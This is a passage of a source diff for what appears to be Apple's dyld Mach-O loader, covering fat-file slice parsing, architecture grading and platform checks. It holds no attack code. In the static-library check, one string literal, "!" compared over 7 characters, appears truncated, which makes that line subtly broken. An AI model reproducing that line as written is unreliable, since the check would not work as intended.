BUILDING_DYLD + result = ::stat_with_subsystem(path, buf); +#else + result = ::stat(path, buf); +#endif + } while ((result == -1) && ((errno == EAGAIN) || (errno == EINTR))); + + return result; +} + +// wrap calls to stat() with check for EAGAIN +int fstatat(int fd, const char *path, struct stat *buf, int flag) +{ + int result; + do { + result = ::fstatat(fd, path, buf, flag); + } while ((result == -1) && ((errno == EAGAIN) || (errno == EINTR))); + + return result; +} + +// dyld should retry open() if it gets an EGAIN +int open(const char* path, int flag, int other) +{ + int result; + do { +#if BUILDING_DYLD + if (flag & O_CREAT) + result = ::open(path, flag, other); + else + result = ::open_with_subsystem(path, flag); +#else + result = ::open(path, flag, other); +#endif + } while ((result == -1) && ((errno == EAGAIN) || (errno == EINTR))); + + return result; +} +#endif // !TARGET_OS_EXCLAVEKIT + + +//////////////////////////// FatFile //////////////////////////////////////// + +const FatFile* FatFile::isFatFile(const void* fileStart) +{ + const FatFile* fileStartAsFat = (FatFile*)fileStart; + if ( (fileStartAsFat->magic == OSSwapBigToHostInt32(FAT_MAGIC)) || (fileStartAsFat->magic == OSSwapBigToHostInt32(FAT_MAGIC_64)) ) + return fileStartAsFat; + else + return nullptr; +} + +bool FatFile::isValidSlice(Diagnostics& diag, uint64_t fileLen, uint32_t sliceIndex, + uint32_t sliceCpuType, uint32_t sliceCpuSubType, uint64_t sliceOffset, uint64_t sliceLen) const { + if ( greaterThanAddOrOverflow(sliceOffset, sliceLen, fileLen) ) { + diag.error("slice %d extends beyond end of file", sliceIndex); + return false; + } + const dyld3::MachOFile* mf = (const dyld3::MachOFile*)((uint8_t*)this+sliceOffset); + if (!mf->isMachO(diag, sliceLen)) + return false; + if ( mf->cputype != (cpu_type_t)sliceCpuType ) { + diag.error("cpu type in slice (0x%08X) does not match fat header (0x%08X)", mf->cputype, sliceCpuType); + return false; + } + else if ( (mf->cpusubtype & ~CPU_SUBTYPE_MASK) != (sliceCpuSubType & ~CPU_SUBTYPE_MASK) ) { + diag.error("cpu subtype in slice (0x%08X) does not match fat header (0x%08X)", mf->cpusubtype, sliceCpuSubType); + return false; + } + uint32_t pageSizeMask = mf->uses16KPages() ? 0x3FFF : 0xFFF; + if ( (sliceOffset & pageSizeMask) != 0 ) { + // slice not page aligned + if ( strncmp((char*)this+sliceOffset, "!", 7) == 0 ) + diag.error("file is static library"); + else + diag.error("slice is not page aligned"); + return false; + } + return true; +} + +void FatFile::forEachSlice(Diagnostics& diag, uint64_t fileLen, bool validate, + void (^callback)(uint32_t sliceCpuType, uint32_t sliceCpuSubType, const void* sliceStart, uint64_t sliceSize, bool& stop)) const +{ + if ( this->magic == OSSwapBigToHostInt32(FAT_MAGIC) ) { + const uint64_t maxArchs = ((4096 - sizeof(fat_header)) / sizeof(fat_arch)); + const uint32_t numArchs = OSSwapBigToHostInt32(nfat_arch); + if ( numArchs > maxArchs ) { + diag.error("fat header too large: %u entries", numArchs); + return; + } + // make sure architectures list doesn't exceed the file size + // We can’t overflow due to maxArch check + // Check numArchs+1 to cover the extra read after the loop + if ( (sizeof(fat_header) + ((numArchs + 1) * sizeof(fat_arch))) > fileLen ) { + diag.error("fat header malformed, architecture slices extend beyond end of file"); + return; + } + bool stop = false; + const fat_arch* const archs = (fat_arch*)(((char*)this)+sizeof(fat_header)); + for (uint32_t i=0; i < numArchs; ++i) { + uint32_t cpuType = OSSwapBigToHostInt32(archs[i].cputype); + uint32_t cpuSubType = OSSwapBigToHostInt32(archs[i].cpusubtype); + uint32_t offset = OSSwapBigToHostInt32(archs[i].offset); + uint32_t len = OSSwapBigToHostInt32(archs[i].size); + Diagnostics sliceDiag; + if ( !validate || isValidSlice(sliceDiag, fileLen, i, cpuType, cpuSubType, offset, len) ) + callback(cpuType, cpuSubType, (uint8_t*)this+offset, len, stop); + if ( stop ) + break; + if ( sliceDiag.hasError() ) + diag.appendError("%s, ", sliceDiag.errorMessageCStr()); + } + + // Look for one more slice + if ( numArchs != maxArchs ) { + uint32_t cpuType = OSSwapBigToHostInt32(archs[numArchs].cputype); + uint32_t cpuSubType = OSSwapBigToHostInt32(archs[numArchs].cpusubtype); + uint32_t offset = OSSwapBigToHostInt32(archs[numArchs].offset); + uint32_t len = OSSwapBigToHostInt32(archs[numArchs].size); + if ((cpuType == CPU_TYPE_ARM64) && ((cpuSubType == CPU_SUBTYPE_ARM64_ALL || cpuSubType == CPU_SUBTYPE_ARM64_V8))) { + if ( !validate || isValidSlice(diag, fileLen, numArchs, cpuType, cpuSubType, offset, len) ) + callback(cpuType, cpuSubType, (uint8_t*)this+offset, len, stop); + } + } + } + else if ( this->magic == OSSwapBigToHostInt32(FAT_MAGIC_64) ) { + const uint32_t numArchs = OSSwapBigToHostInt32(nfat_arch); + if ( numArchs > ((4096 - sizeof(fat_header)) / sizeof(fat_arch_64)) ) { + diag.error("fat header too large: %u entries", OSSwapBigToHostInt32(nfat_arch)); + return; + } + // make sure architectures list doesn't exceed the file size + // We can’t overflow due to maxArch check + if ( (sizeof(fat_header) + (numArchs * sizeof(fat_arch_64))) > fileLen ) { + diag.error("fat header malformed, architecture slices extend beyond end of file"); + return; + } + bool stop = false; + const fat_arch_64* const archs = (fat_arch_64*)(((char*)this)+sizeof(fat_header)); + for (uint32_t i=0; i < numArchs; ++i) { + uint32_t cpuType = OSSwapBigToHostInt32(archs[i].cputype); + uint32_t cpuSubType = OSSwapBigToHostInt32(archs[i].cpusubtype); + uint64_t offset = OSSwapBigToHostInt64(archs[i].offset); + uint64_t len = OSSwapBigToHostInt64(archs[i].size); + if ( !validate || isValidSlice(diag, fileLen, i, cpuType, cpuSubType, offset, len) ) + callback(cpuType, cpuSubType, (uint8_t*)this+offset, len, stop); + if ( stop ) + break; + } + } + else { + diag.error("not a fat file"); + } +} + +void FatFile::forEachSlice(Diagnostics& diag, uint64_t fileLen, void (^callback)(uint32_t sliceCpuType, uint32_t sliceCpuSubType, const void* sliceStart, uint64_t sliceSize, bool& stop)) const +{ + forEachSlice(diag, fileLen, true, callback); +} + +const char* FatFile::archNames(char strBuf[256], uint64_t fileLen) const +{ + strBuf[0] = '\0'; + Diagnostics diag; + __block bool needComma = false; + this->forEachSlice(diag, fileLen, false, ^(uint32_t sliceCpuType, uint32_t sliceCpuSubType, const void* sliceStart, uint64_t sliceSize, bool& stop) { + if ( needComma ) + strlcat(strBuf, ",", 256); + strlcat(strBuf, MachOFile::archName(sliceCpuType, sliceCpuSubType), 256); + needComma = true; + }); + return strBuf; +} + +bool FatFile::isFatFileWithSlice(Diagnostics& diag, uint64_t fileLen, const GradedArchs& archs, bool isOSBinary, + uint64_t& sliceOffset, uint64_t& sliceLen, bool& missingSlice) const +{ + missingSlice = false; + if ( (this->magic != OSSwapBigToHostInt32(FAT_MAGIC)) && (this->magic != OSSwapBigToHostInt32(FAT_MAGIC_64)) ) + return false; + + __block int bestGrade = 0; + forEachSlice(diag, fileLen, ^(uint32_t sliceCpuType, uint32_t sliceCpuSubType, const void* sliceStart, uint64_t sliceSize, bool& stop) { + if (int sliceGrade = archs.grade(sliceCpuType, sliceCpuSubType, isOSBinary)) { + if ( sliceGrade > bestGrade ) { + sliceOffset = (char*)sliceStart - (char*)this; + sliceLen = sliceSize; + bestGrade = sliceGrade; + } + } + }); + if ( diag.hasError() ) + return false; + + if ( bestGrade == 0 ) + missingSlice = true; + + return (bestGrade != 0); +} + + +//////////////////////////// GradedArchs //////////////////////////////////////// + + +#define GRADE_i386 CPU_TYPE_I386, CPU_SUBTYPE_I386_ALL, false +#define GRADE_x86_64 CPU_TYPE_X86_64, CPU_SUBTYPE_X86_64_ALL, false +#define GRADE_x86_64h CPU_TYPE_X86_64, CPU_SUBTYPE_X86_64_H, false +#define GRADE_armv7 CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7, false +#define GRADE_armv7s CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7S, false +#define GRADE_armv7k CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7K, false +#define GRADE_armv6m CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V6M, false +#define GRADE_armv7m CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7M, false +#define GRADE_armv7em CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7EM, false +#define GRADE_armv8m CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V8M, false +#define GRADE_arm64 CPU_TYPE_ARM64, CPU_SUBTYPE_ARM64_ALL, false +#define GRADE_arm64e CPU_TYPE_ARM64, CPU_SUBTYPE_ARM64E, false +#define GRADE_arm64e_pb CPU_TYPE_ARM64, CPU_SUBTYPE_ARM64E, true +#define GRADE_arm64_32 CPU_TYPE_ARM64_32, CPU_SUBTYPE_ARM64_32_V8, false + +const GradedArchs GradedArchs::i386 = GradedArchs({GRADE_i386, 1}); +const GradedArchs GradedArchs::x86_64 = GradedArchs({GRADE_x86_64, 1}); +const GradedArchs GradedArchs::x86_64h = GradedArchs({GRADE_x86_64h, 2}, {GRADE_x86_64, 1}); +const GradedArchs GradedArchs::arm64 = GradedArchs({GRADE_arm64, 1}); +#if SUPPORT_ARCH_arm64e +const GradedArchs GradedArchs::arm64e_keysoff = GradedArchs({GRADE_arm64e, 2}, {GRADE_arm64, 1}); +const GradedArchs GradedArchs::arm64e_keysoff_pb = GradedArchs({GRADE_arm64e_pb, 2}, {GRADE_arm64, 1}); +const GradedArchs GradedArchs::arm64e = GradedArchs({GRADE_arm64e, 1}); +const GradedArchs GradedArchs::arm64e_pb = GradedArchs({GRADE_arm64e_pb, 1}); +#endif +const GradedArchs GradedArchs::armv7 = GradedArchs({GRADE_armv7, 1}); +const GradedArchs GradedArchs::armv7s = GradedArchs({GRADE_armv7s, 2}, {GRADE_armv7, 1}); +const GradedArchs GradedArchs::armv7k = GradedArchs({GRADE_armv7k, 1}); +const GradedArchs GradedArchs::armv7m = GradedArchs({GRADE_armv7m, 1}); +const GradedArchs GradedArchs::armv7em = GradedArchs({GRADE_armv7em, 1}); + + +#if SUPPORT_ARCH_arm64_32 +const GradedArchs GradedArchs::arm64_32 = GradedArchs({GRADE_arm64_32, 1}); +#endif +#if BUILDING_LIBDYLD || BUILDING_UNIT_TESTS +const GradedArchs GradedArchs::launch_AS = GradedArchs({GRADE_arm64e, 3}, {GRADE_arm64, 2}, {GRADE_x86_64, 1}); +const GradedArchs GradedArchs::launch_AS_Sim = GradedArchs({GRADE_arm64, 2}, {GRADE_x86_64, 1}); +const GradedArchs GradedArchs::launch_Intel_h = GradedArchs({GRADE_x86_64h, 3}, {GRADE_x86_64, 2}, {GRADE_i386, 1}); +const GradedArchs GradedArchs::launch_Intel = GradedArchs({GRADE_x86_64, 2}, {GRADE_i386, 1}); +const GradedArchs GradedArchs::launch_Intel_Sim = GradedArchs({GRADE_x86_64, 2}, {GRADE_i386, 1}); +#endif + +int GradedArchs::grade(uint32_t cputype, uint32_t cpusubtype, bool isOSBinary) const +{ + for (const auto& p : _orderedCpuTypes) { + if (p.type == 0) { break; } + if ( (p.type == cputype) && (p.subtype == (cpusubtype & ~CPU_SUBTYPE_MASK)) ) { + if ( p.osBinary ) { + if ( isOSBinary ) + return p.grade; + } + else { + return p.grade; + } + } + } + return 0; +} + +const char* GradedArchs::name() const +{ + return MachOFile::archName(_orderedCpuTypes[0].type, _orderedCpuTypes[0].subtype); +} + +void GradedArchs::forEachArch(bool platformBinariesOnly, void (^handler)(const char*)) const +{ + for (const auto& p : _orderedCpuTypes) { + if (p.type == 0) + break; + if ( p.osBinary && !platformBinariesOnly ) + continue; + handler(MachOFile::archName(p.type, p.subtype)); + } +} + +bool GradedArchs::checksOSBinary() const +{ + for (const auto& p : _orderedCpuTypes) { + if (p.type == 0) { return false; } + if ( p.osBinary ) { return true; } + } + __builtin_unreachable(); +} + +bool GradedArchs::supports64() const +{ + return (_orderedCpuTypes.front().type & CPU_ARCH_ABI64) != 0; +} + +#if __x86_64__ +static bool isHaswell() +{ + // FIXME: figure out a commpage way to check this + struct host_basic_info info; + mach_msg_type_number_t count = HOST_BASIC_INFO_COUNT; + mach_port_t hostPort = mach_host_self(); + kern_return_t result = host_info(hostPort, HOST_BASIC_INFO, (host_info_t)&info, &count); + mach_port_deallocate(mach_task_self(), hostPort); + return (result == KERN_SUCCESS) && (info.cpu_subtype == CPU_SUBTYPE_X86_64_H); +} +#endif + +const GradedArchs& GradedArchs::forCurrentOS(bool keysOff, bool osBinariesOnly) +{ +#if __arm64e__ + if ( osBinariesOnly ) + return (keysOff ? arm64e_keysoff_pb : arm64e_pb); + else + return (keysOff ? arm64e_keysoff : arm64e); +#elif __ARM64_ARCH_8_32__ + return arm64_32; +#elif __arm64__ + return arm64; +#elif __ARM_ARCH_7K__ + return armv7k; +#elif __ARM_ARCH_7S__ + return armv7s; +#elif __ARM_ARCH_7A__ + return armv7; +#elif __x86_64__ + #if TARGET_OS_SIMULATOR + return x86_64; + #else + return isHaswell() ? x86_64h : x86_64; + #endif +#elif __i386__ + return i386; +#else + #error unknown platform +#endif +} + +#if BUILDING_LIBDYLD || BUILDING_UNIT_TESTS +const GradedArchs& GradedArchs::launchCurrentOS(const char* simArches) +{ +#if TARGET_OS_SIMULATOR + // on Apple Silicon, there is both an arm64 and an x86_64 (under rosetta) simulators + // You cannot tell if you are running under rosetta, so CoreSimulator sets SIMULATOR_ARCHS + if ( strcmp(simArches, "arm64 x86_64") == 0 ) + return launch_AS_Sim; + else + return x86_64; +#elif TARGET_OS_OSX + #if __arm64__ + return launch_AS; + #else + return isHaswell() ? launch_Intel_h : launch_Intel; + #endif +#else + // all other platforms use same grading for executables as dylibs + return forCurrentOS(true, false); +#endif +} +#endif // BUILDING_LIBDYLD + +const GradedArchs& GradedArchs::forName(const char* archName, bool keysOff) +{ + if (strcmp(archName, "x86_64h") == 0 ) + return x86_64h; + else if (strcmp(archName, "x86_64") == 0 ) + return x86_64; +#if SUPPORT_ARCH_arm64e + else if (strcmp(archName, "arm64e") == 0 ) + return keysOff ? arm64e_keysoff : arm64e; +#endif + else if (strcmp(archName, "arm64") == 0 ) + return arm64; + else if (strcmp(archName, "armv7k") == 0 ) + return armv7k; + else if (strcmp(archName, "armv7s") == 0 ) + return armv7s; + else if (strcmp(archName, "armv7") == 0 ) + return armv7; + else if (strcmp(archName, "armv7m") == 0 ) + return armv7m; + else if (strcmp(archName, "armv7em") == 0 ) + return armv7em; +#if SUPPORT_ARCH_arm64_32 + else if (strcmp(archName, "arm64_32") == 0 ) + return arm64_32; +#endif + else if (strcmp(archName, "i386") == 0 ) + return i386; + assert(0 && "unknown arch name"); +} + + + +//////////////////////////// MachOFile //////////////////////////////////////// + + +const MachOFile::ArchInfo MachOFile::_s_archInfos[] = { + { "x86_64", CPU_TYPE_X86_64, CPU_SUBTYPE_X86_64_ALL }, + { "x86_64h", CPU_TYPE_X86_64, CPU_SUBTYPE_X86_64_H }, + { "i386", CPU_TYPE_I386, CPU_SUBTYPE_I386_ALL }, + { "arm64", CPU_TYPE_ARM64, CPU_SUBTYPE_ARM64_ALL }, +#if SUPPORT_ARCH_arm64e + { "arm64e", CPU_TYPE_ARM64, CPU_SUBTYPE_ARM64E }, +#endif +#if SUPPORT_ARCH_arm64_32 + { "arm64_32", CPU_TYPE_ARM64_32, CPU_SUBTYPE_ARM64_32_V8 }, +#endif + { "armv7k", CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7K }, + { "armv7s", CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7S }, + { "armv7", CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7 }, + { "armv6m", CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V6M }, + { "armv7m", CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7M }, + { "armv7em", CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7EM }, + { "armv8m", CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V8M }, +}; + +const MachOFile::PlatformInfo MachOFile::_s_platformInfos[] = { + { "macOS", Platform::macOS, LC_VERSION_MIN_MACOSX }, + { "iOS", Platform::iOS, LC_VERSION_MIN_IPHONEOS }, + { "tvOS", Platform::tvOS, LC_VERSION_MIN_TVOS }, + { "watchOS", Platform::watchOS, LC_VERSION_MIN_WATCHOS }, + { "bridgeOS", Platform::bridgeOS, LC_BUILD_VERSION }, + { "MacCatalyst", Platform::iOSMac, LC_BUILD_VERSION }, + { "iOS-sim", Platform::iOS_simulator, LC_BUILD_VERSION }, + { "tvOS-sim", Platform::tvOS_simulator, LC_BUILD_VERSION }, + { "watchOS-sim", Platform::watchOS_simulator, LC_BUILD_VERSION }, + { "driverKit", Platform::driverKit, LC_BUILD_VERSION }, +}; + + + +bool MachOFile::is64() const +{ + return (this->magic == MH_MAGIC_64); +} + +size_t MachOFile::machHeaderSize() const +{ + return is64() ? sizeof(mach_header_64) : sizeof(mach_header); +} + +uint32_t MachOFile::maskedCpuSubtype() const +{ + return (this->cpusubtype & ~CPU_SUBTYPE_MASK); +} + +uint32_t MachOFile::pointerSize() const +{ + if (this->magic == MH_MAGIC_64) + return 8; + else + return 4; +} + +bool MachOFile::uses16KPages() const +{ + switch (this->cputype) { + case CPU_TYPE_ARM64: + case CPU_TYPE_ARM64_32: + return true; + case CPU_TYPE_ARM: + // iOS is 16k aligned for armv7/armv7s and watchOS armv7k is 16k aligned + // HACK: Pretend armv7k kexts are 4k aligned + if ( this->isKextBundle() ) + return false; + return this->cpusubtype == CPU_SUBTYPE_ARM_V7K; + default: + return false; + } +} + +bool MachOFile::isArch(const char* aName) const +{ + return (strcmp(aName, archName(this->cputype, this->cpusubtype)) == 0); +} + +const char* MachOFile::archName(uint32_t cputype, uint32_t cpusubtype) +{ + for (const ArchInfo& info : _s_archInfos) { + if ( (cputype == info.cputype) && ((cpusubtype & ~CPU_SUBTYPE_MASK) == info.cpusubtype) ) { + return info.name; + } + } + return "unknown"; +} + +bool MachOFile::cpuTypeFromArchName(const char* archName, cpu_type_t* cputype, cpu_subtype_t* cpusubtype) +{ + for (const ArchInfo& info : _s_archInfos) { + if ( strcmp(archName, info.name) == 0 ) { + *cputype = info.cputype; + *cpusubtype = info.cpusubtype; + return true; + } + } + return false; +} + +const char* MachOFile::archName() const +{ + return archName(this->cputype, this->cpusubtype); +} + +static void appendDigit(char*& s, unsigned& num, unsigned place, bool& startedPrinting) +{ + if ( num >= place ) { + unsigned dig = (num/place); + *s++ = '0' + dig; + num -= (dig*place); + startedPrinting = true; + } + else if ( startedPrinting ) { + *s++ = '0'; + } +} + +static void appendNumber(char*& s, unsigned num) +{ + assert(num < 99999); + bool startedPrinting = false; + appendDigit(s, num, 10000, startedPrinting); + appendDigit(s, num, 1000, startedPrinting); + appendDigit(s, num, 100, startedPrinting); + appendDigit(s, num, 10, startedPrinting); + appendDigit(s, num, 1, startedPrinting); + if ( !startedPrinting ) + *s++ = '0'; +} + +void MachOFile::packedVersionToString(uint32_t packedVersion, char versionString[32]) +{ + // sprintf(versionString, "%d.%d.%d", (packedVersion >> 16), ((packedVersion >> 8) & 0xFF), (packedVersion & 0xFF)); + char* s = versionString; + appendNumber(s, (packedVersion >> 16)); + *s++ = '.'; + appendNumber(s, (packedVersion >> 8) & 0xFF); + if ( (packedVersion & 0xFF) != 0 ) { + *s++ = '.'; + appendNumber(s, (packedVersion & 0xFF)); + } + *s++ = '\0'; +} + +bool MachOFile::builtForPlatform(Platform reqPlatform, bool onlyOnePlatform) const +{ + __block bool foundRequestedPlatform = false; + __block bool foundOtherPlatform = false; + forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) { + if ( platform == reqPlatform ) + foundRequestedPlatform = true; + else + foundOtherPlatform = true; + }); + // if checking that this binary is built for exactly one platform, fail if more + if ( foundOtherPlatform && onlyOnePlatform ) + return false; + if ( foundRequestedPlatform ) + return true; + + // binary has no explict load command to mark platform + // could be an old macOS binary, look at arch + if ( !foundOtherPlatform && (reqPlatform == Platform::macOS) ) { + if ( this->cputype == CPU_TYPE_X86_64 ) + return true; + if ( this->cputype == CPU_TYPE_I386 ) + return true; + } + +#if BUILDING_DYLDINFO + // Allow offline tools to analyze binaries dyld doesn't load, ie, those with platforms + if ( !foundOtherPlatform && (reqPlatform == Platform::unknown) ) + return true; +#endif + + return false; +} + +bool MachOFile::loadableIntoProcess(Platform processPlatform, const char* path, bool internalInstall) const +{ + if ( this->builtForPlatform(processPlatform) ) + return true; + + // Some host macOS dylibs can be loaded into simulator processes + if ( MachOFile::isSimulatorPlatform(processPlatform) && this->builtForPlatform(Platform::macOS)) { + static const char* const macOSHost[] = { + "/usr/lib/system/libsystem_kernel.dylib", + "/usr/lib/system/libsystem_platform.dylib", + "/usr/lib/system/libsystem_pthread.dylib", + "/usr/lib/system/libsystem_platform_debug.dylib", + "/usr/lib/system/libsystem_pthread_debug.dylib", + "/usr/lib/system/host/liblaunch_sim.dylib", + }; + for (const char* libPath : macOSHost) { + if (strcmp(libPath, path) == 0) + return true; + } + } + + // If this is being called on main executable where we expect a macOS program, Catalyst programs are also runnable + if ( (this->filetype == MH_EXECUTE) && (processPlatform == Platform::macOS) && this->builtForPlatform(Platform::iOSMac, true) ) + return true; +#if (TARGET_OS_OSX && TARGET_CPU_ARM64) + if ( (this->filetype == MH_EXECUTE) && (processPlatform == Platform::macOS) && this->builtForPlatform(Platform::iOS, true) ) + return true; +#endif + + + bool iOSonMac = (processPlatform == Platform::iOSMac); +#if (TARGET_OS_OSX && TARGET_CPU_ARM64) + // allow iOS binaries in iOSApp + if ( processPlatform == Platform::iOS ) { + // can load Catalyst binaries into iOS process + if ( this->builtForPlatform(Platform::iOSMac) ) + return true; + iOSonMac = true; + } +#endif + // macOS dylibs can be loaded into iOSMac processes + if ( (iOSonMac) && this->builtForPlatform(Platform::macOS, true) ) + return true; + + + return false; +} + +bool MachOFile::isZippered() const +{ + __block bool macOS = false; + __block bool iOSMac = false; + forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) { + if ( platform == Platform::macOS ) + macOS = true; + else if ( platform == Platform::iOSMac ) + iOSMac = true; + }); + return macOS && iOSMac; +} + +bool MachOFile::inDyldCache() const { + return (this->flags & MH_DYLIB_IN_CACHE); +} + +Platform MachOFile::currentPlatform() +{ +#if TARGET_OS_SIMULATOR + #if TARGET_OS_WATCH + return Platform::watchOS_simulator; + #elif TARGET_OS_TV + return Platform::tvOS_simulator; + #else + return Platform::iOS_simulator; + #endif +#elif TARGET_OS_BRIDGE + return Platform::bridgeOS; +#elif TARGET_OS_WATCH + return Platform::watchOS; +#elif TARGET_OS_TV + return Platform::tvOS; +#elif TARGET_OS_IOS + return Platform::iOS; +#elif TARGET_OS_OSX + return Platform::macOS; +#elif TARGET_OS_DRIVERKIT + return Platform::driverKit; +#else + #error unknown platform +#endif +} + +Platform MachOFile::basePlatform(dyld3::Platform reqPlatform) { + switch(reqPlatform) { + case Platform::unknown: return Platform::unknown; + case Platform::macOS: return Platform::macOS; + case Platform::iOS: return Platform::iOS; + case Platform::tvOS: return Platform::tvOS; + case Platform::watchOS: return Platform::watchOS; + case Platform::bridgeOS: return Platform::bridgeOS; + case Platform::iOSMac: return Platform::iOS; + case Platform::iOS_simulator: return Platform::iOS; + case Platform::tvOS_simulator: return Platform::tvOS; + case Platform::watchOS_simulator: return Platform::watchOS; + case Platform::driverKit: return Platform::driverKit; + default: return Platform::unknown; + } +} + + +const char* MachOFile::currentArchName() +{ +#if __ARM_ARCH_7K__ + return "armv7k"; +#elif __ARM_ARCH_7A__ + return "armv7"; +#elif __ARM_ARCH_7S__ + return "armv7s"; +#elif __arm64e__ + return "arm64e"; +#elif __arm64__ +#if __LP64__ + return "arm64"; +#else + return "arm64_32"; +#endif +#elif __x86_64__ + return isHaswell() ? "x86_64h" : "x86_64"; +#elif __i386__ + return "i386"; +#else + #error unknown arch +#endif +} + +bool MachOFile::isSimulatorPlatform(Platform platform, Platform* basePlatform) +{ + switch ( platform ) { + case Platform::iOS_simulator: + if ( basePlatform ) + *basePlatform = Platform::iOS; + return true; + case Platform::watchOS_simulator: + if ( basePlatform ) + *basePlatform = Platform::watchOS; + return true; + case Platform::tvOS_simulator: + if ( basePlatform ) + *basePlatform = Platform::tvOS; + return true; + default: + return false; + } +} + +bool MachOFile::isBuiltForSimulator() const +{ + __block bool result = false; + this->forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) { + switch ( platform ) { + case Platform::iOS_simulator: + case Platform::watchOS_simulator: + case Platform::tvOS_simulator: + result = true; + break; + default: + break; + } + }); + return result; +} + +bool MachOFile::isDyld() const +{ + return (this->filetype == MH_DYLINKER); +} + +bool MachOFile::isDyldManaged() const { + switch ( this->filetype ) { + case MH_BUNDLE: + case MH_EXECUTE: + case MH_DYLIB: + return true; + default: + break; + } + return false; +} + +bool MachOFile::isDylib() const +{ + return (this->filetype == MH_DYLIB); +} + +bool MachOFile::isBundle() const +{ + return (this->filetype == MH_BUNDLE); +} + +bool MachOFile::isMainExecutable() const +{ + return (this->filetype == MH_EXECUTE); +} + +bool MachOFile::isDynamicExecutable() const +{ + if ( this->filetype != MH_EXECUTE ) + return false; + + // static executables do not have dyld load command + return hasLoadCommand(LC_LOAD_DYLINKER); +} + +bool MachOFile::isStaticExecutable() const +{ + if ( this->filetype != MH_EXECUTE ) + return false; + + // static executables do not have dyld load command + return !hasLoadCommand(LC_LOAD_DYLINKER); +} + +bool MachOFile::isKextBundle() const +{ + return (this->filetype == MH_KEXT_BUNDLE); +} + +bool MachOFile::isFileSet() const +{ + return (this->filetype == MH_FILESET); +} + +bool MachOFile::isPIE() const +{ + return (this->flags & MH_PIE); +} + +bool MachOFile::isPreload() const +{ + return (this->filetype == MH_PRELOAD); +} + +const char* MachOFile::platformName(Platform reqPlatform) +{ + for (const PlatformInfo& info : _s_platformInfos) { + if ( info.platform == reqPlatform ) + return info.name; + } + return "unknown"; +} + +void MachOFile::forEachSupportedPlatform(void (^handler)(Platform platform, uint32_t minOS, uint32_t sdk)) const +{ + Diagnostics diag; + __block bool foundPlatform = false; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + const build_version_command* buildCmd = (build_version_command *)cmd; + const version_min_command* versCmd = (version_min_command*)cmd; + uint32_t sdk; + switch ( cmd->cmd ) { + case LC_BUILD_VERSION: + handler((Platform)(buildCmd->platform), buildCmd->minos, buildCmd->sdk); + foundPlatform = true; + break; + case LC_VERSION_MIN_MACOSX: + sdk = versCmd->sdk; + // The original LC_VERSION_MIN_MACOSX did not have an sdk field, assume sdk is same as minOS for those old binaries + if ( sdk == 0 ) + sdk = versCmd->version; + handler(Platform::macOS, versCmd->version, sdk); + foundPlatform = true; + break; + case LC_VERSION_MIN_IPHONEOS: + if ( (this->cputype == CPU_TYPE_X86_64) || (this->cputype == CPU_TYPE_I386) ) + handler(Platform::iOS_simulator, versCmd->version, versCmd->sdk); // old sim binary + else + handler(Platform::iOS, versCmd->version, versCmd->sdk); + foundPlatform = true; + break; + case LC_VERSION_MIN_TVOS: + if ( this->cputype == CPU_TYPE_X86_64 ) + handler(Platform::tvOS_simulator, versCmd->version, versCmd->sdk); // old sim binary + else + handler(Platform::tvOS, versCmd->version, versCmd->sdk); + foundPlatform = true; + break; + case LC_VERSION_MIN_WATCHOS: + if ( (this->cputype == CPU_TYPE_X86_64) || (this->cputype == CPU_TYPE_I386) ) + handler(Platform::watchOS_simulator, versCmd->version, versCmd->sdk); // old sim binary + else + handler(Platform::watchOS, versCmd->version, versCmd->sdk); + foundPlatform = true; + break; + } + }); + if ( !foundPlatform ) { + // old binary with no explicit platform +#if (BUILDING_DYLD || BUILDING_CLOSURE_UTIL) && TARGET_OS_OSX + if ( this->cputype == CPU_TYPE_X86_64 ) + handler(Platform::macOS, 0x000A0500, 0x000A0500); // guess it is a macOS 10.5 binary + // + // The Go linker emits non-standard binaries without a platform and we have to live with it. + if ( this->cputype == CPU_TYPE_ARM64 ) + handler(Platform::macOS, 0x000B0000, 0x000B0000); // guess it is a macOS 11.0 binary +#endif + } + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call +} + +void MachOFile::forEachSupportedBuildTool(void (^handler)(Platform platform, uint32_t tool, uint32_t version)) const +{ + Diagnostics diag; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + switch ( cmd->cmd ) { + case LC_BUILD_VERSION: { + const build_version_command* buildCmd = (build_version_command *)cmd; + for ( uint32_t i = 0; i != buildCmd->ntools; ++i ) { + uint32_t offset = sizeof(build_version_command) + (i * sizeof(build_tool_version)); + if ( offset >= cmd->cmdsize ) + break; + + const build_tool_version* firstTool = (const build_tool_version*)(&buildCmd[1]); + handler((Platform)(buildCmd->platform), firstTool[i].tool, firstTool[i].version); + } + } + } + }); + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call +} + + +bool MachOFile::isMachO(Diagnostics& diag, uint64_t fileSize) const +{ + if ( fileSize < sizeof(mach_header) ) { + diag.error("MachO header exceeds file length"); + return false; + } + + if ( !hasMachOMagic() ) { + // old PPC slices are not currently valid "mach-o" but should not cause an error + if ( !hasMachOBigEndianMagic() ) + diag.error("file does not start with MH_MAGIC[_64]"); + return false; + } + if ( this->sizeofcmds + machHeaderSize() > fileSize ) { + diag.error("load commands exceed length of first segment"); + return false; + } + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { }); + return diag.noError(); +} + + +const MachOFile* MachOFile::isMachO(const void* content) +{ + const MachOFile* mf = (MachOFile*)content; + if ( mf->hasMachOMagic() ) + return mf; + return nullptr; +} + +bool MachOFile::hasMachOMagic() const +{ + return ( (this->magic == MH_MAGIC) || (this->magic == MH_MAGIC_64) ); +} + +bool MachOFile::hasMachOBigEndianMagic() const +{ + return 